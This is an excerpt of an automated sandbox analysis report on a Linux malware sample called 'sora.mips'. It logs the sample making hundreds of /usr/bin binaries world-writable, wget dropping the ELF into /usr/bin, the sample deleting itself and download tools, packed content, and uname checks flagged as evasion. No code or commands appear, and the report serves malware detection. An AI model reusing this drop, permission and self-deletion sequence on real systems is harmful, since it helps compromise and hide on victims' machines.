Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-set-selections (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-show (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/delpart (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/delv (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-install (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-validate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/devdump (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/df (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dfu-tool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_bash-completion (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_installxmlcatalogs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_perl_openssl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_python2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/diff (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/diff3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dig (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dir (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dircolors (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirmngr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirmngr-client (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirsplit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/disco (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dm-tool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dmcs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dmesg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dnsdomainname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/do-release-upgrade (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/domainname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-deb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-divert (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-maintscript-helper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-query (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-split (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-statoverride (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-trigger (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/driverless (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dtd2rng (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dtd2xsd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/du (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dumpkeys (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dvipdf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dwp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eatmydata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ec2metadata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/echo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ed (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/editor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/editres (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/egrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eject (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/elfedit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enc2xs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/encguess (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enchant-2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enchant-lsmod-2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/engrampa (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/env (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/envsubst (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eps2eps (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eqn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/erb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/erb2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/esc-m (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/espeak (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eutp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince-previewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ex (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-csource (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-desktop-item-edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-open (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-preferred-applications (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expand (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expiry (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/factor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/faillog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fallocate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/false (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-cache (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-cat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-conflist (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-list (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-match (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-pattern (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-query (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-scan (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-validate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fgconsole (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fgrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/file (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/file2brl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/finalrd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fincore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/find (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/findmnt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/firefox (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/flock (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fmt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fold (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fonttosfnt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2ddst (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2ddst-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hbpl2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hbpl2-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hiperc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hiperc-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hp2600-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2lava (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2lava-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2oak (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2oak-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2qpdl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2qpdl-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2slx (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2slx-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2xqx (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2xqx-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-icc2ps (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-pstops (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foomatic-rip (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-delete (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-enroll (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-list (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-verify (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/free (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/from (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ftp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/funzip (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fuser (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fusermount (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdagent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdmgr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdtool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdtpmevlog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gacutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gamma4scanimage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gapplication (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gatttool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gawk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gcore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gcr-viewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdb-add-index (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbserver (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbtui (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbus (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdialog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-csource (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-pixdata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdm-screenshot (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdmflexiserver (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gedit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gem (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gem2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/genisoimage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/genxs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/geqn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getcifsacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/geteltorito (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getfacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getkeycodes (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getopt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gettext (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gettext.sh (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ghostscript (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gigolo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-2.10 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-console-2.10 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-test-clipboard-2.0 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ginstall-info (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gio (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gio-querymodules (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gipddecode (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-receive-pack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-shell (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-upload-archive (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-upload-pack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gjs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gjs-console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gkbd-keyboard-display (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glib-compile-schemas (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxdemo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxgears (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxheads (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxinfo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-control-center (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-extensions (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-font-viewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-help (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior

Sets full permissions to files and/or directories

Source: /bin/sh (PID: 6217)

Jump to behavior

Writes ELF files to disk

Source: /usr/bin/wget (PID: 6216)

File written: /usr/bin/sora.mips

Jump to dropped file

Source: submitted sample

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /usr/bin/wget (PID: 6216)

File: /usr/bin/sora.mips

Jump to dropped file

Sample deletes itself

Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/chmod	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/curl	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/rm	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/sora.mips	Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /usr/bin/wget	Jump to behavior

ELF contains segments with high entropy indicating compressed/encrypted content

Source: sora.mips.14.dr

Dropped file: segment LOAD with 7.892 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /usr/bin/curl (PID: 6214)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sora.mips (PID: 6218)	Queries kernel information via 'uname':			Jump to behavior

Source: sora.mips, 6418.1.00005651e0fef000.00005651e103b000.rw-.sdmp	Binary or memory string: QV!/proc/2014/fd/11mips/pr1/usr/bin/vmtoolsd (deleted)
